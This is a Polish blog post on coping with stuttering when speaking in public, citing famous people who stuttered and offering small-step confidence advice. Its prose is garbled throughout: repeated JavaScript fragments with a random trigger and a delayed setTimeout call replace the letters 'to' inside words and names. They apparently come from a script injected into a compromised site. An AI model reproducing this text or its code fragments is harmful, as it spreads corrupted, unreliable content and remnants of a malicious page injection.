Sposób na jąkanie

Czy wiesz co łączy Marylin Monroe, Winsdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tona Churchilla, Kylie Minogue i Adama Michnika?

Tak, wszyscy oni się jąkali lub jąkają!

Jak widzisz, jąkanie nie było przeszkodą w karierze zawodowej a Winsdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton Churchill jest uważany za jednego z najlepszych mówców XX wieku!

Dlaczego o tym piszę? Bo kilka dni temu za pośrednictwem mojego formularza “zapytaj Roberta” (na bocznym pasku na moim blogu) otrzymałem pytanie:
“Jąkam się. Co mam zrobić, żeby bez nerwów mówić, żeby podczas mówienia być rozluźnionym i pewnym? Poda mi Pan jakieś ćwiczenia?”

Na początek mam dla Ciebie poradę jak “ustawić swoje myślenie”, aby być pewniejszym siebie, mimo jąkania.


Nawet osoby mówiące płynnie, nie są zazwyczaj rozluźnione podczas wygłaszania prezentacji. Zawsze dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towarzyszą im emocje, także negatywne. Wiem, że w przypadku osób z wadami wymowy lub jąkających się, ten stres jest o wiele, wiele większy.

Pamiętaj jednak, że wszystko zaczyna się w Twojej głowie.

Jeśli nie zdecydujesz się na wyjście przed publiczność, dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to nie przekonasz się, czy uda Ci się przełamać stres. Nadom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomiast jeśli pomyślisz, “co z tego, że się jąkam?! Zrobię dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to – wyjdę na scenę i powiem dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to, co mam do powiedzenia“, jest szansa, że przynajmniej wykonasz pierwszy krok ku wystąpieniom publicznym. A może nawet osiągniesz sukces?!

Na początek zapewnij sobie życzliwe audydom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torium: najbliższych z rodziny, dobrych znajomych. Wiedząc, że są do Ciebie dobrze nastawieni mówiąc nie będziesz tak zestresowany. Próbuj różnych sposobów: mów wolniej albo szybciej, rób krótkie pauzy a potem dłuższe. Eksperymentuj.

Gdy poczujesz się pewniej w “domowych warunkach”, spróbuj powiedzieć coś na forum, przy jakiejś okazji. To może być kilka, kilkanaście sekund. I tak małymi krokami do przodu.

Jest jeszcze jedna ważna sprawa – można z takiej “przypadłości” zrobić swój znak firmowy. W temacie jąkania patrz Adam Michnik. W temacie kolor włosów “ta ruda z TV” – Katarzyna Dowbor, w temacie “puszysta” – Dorota Wellman.

Wiem, trudno porównać jąkanie z kolorem włosów, czy też “parametrami ciała”, ale jak pisałem kilka akapitów wyżej “wszystko jest w naszej głowie”.

A propos głowy i tego co w niej, gorąco polecam Ci mój artykuł Dwie potężne techniki budujące pewność siebie na scenie.

pozdrawiam serdecznie i życzę powodzenia!

Ps. Ponoć dobrą medom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}todą na walkę z jąkaniem jest… śpiewanie! posłuchaj i obejrzyj Kylie Minogue, chyba dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to prawda 🙂

Poszperałem w internecie i znalazłem kilka artykułów z poradami oraz forum dyskusyjne, na którym wypowiadają się osoby jąkające się. Okazuje się, że “typów jąkania” jest tyle, że trudno znaleźć jedną receptę. Według informacji,które znalazłem w sieci, na pewno przydałby się kontakt z logopedą. Czytałem też, że pomocna może być joga.

Ćwiczenia dla osób jąkających się
Forum dla osób jąkających się
Mam nadzieję, że będą pomocne!

I na koniec fragment programu TVP “Kawa czy herbata” na temat medom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tody Nowa mowa:

.

Robert WarzyńskiO autorze: Robert Ważyński jest autorem książki "Nie boję się mówić" wydanej przez Wydawnictwo Złote Myśli, Jego flagowym przedsięwzięciem jest internetowy kurs "Tajna Księga Mówców" dostępny na platformie interkursy.pl. Na co dzień Robert wyżywa się literacko i filmowo na swoim blogu Tajniki Prezentacji i na YT.

Wpis Ci się podobał?

Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!

One Response

Leave a Reply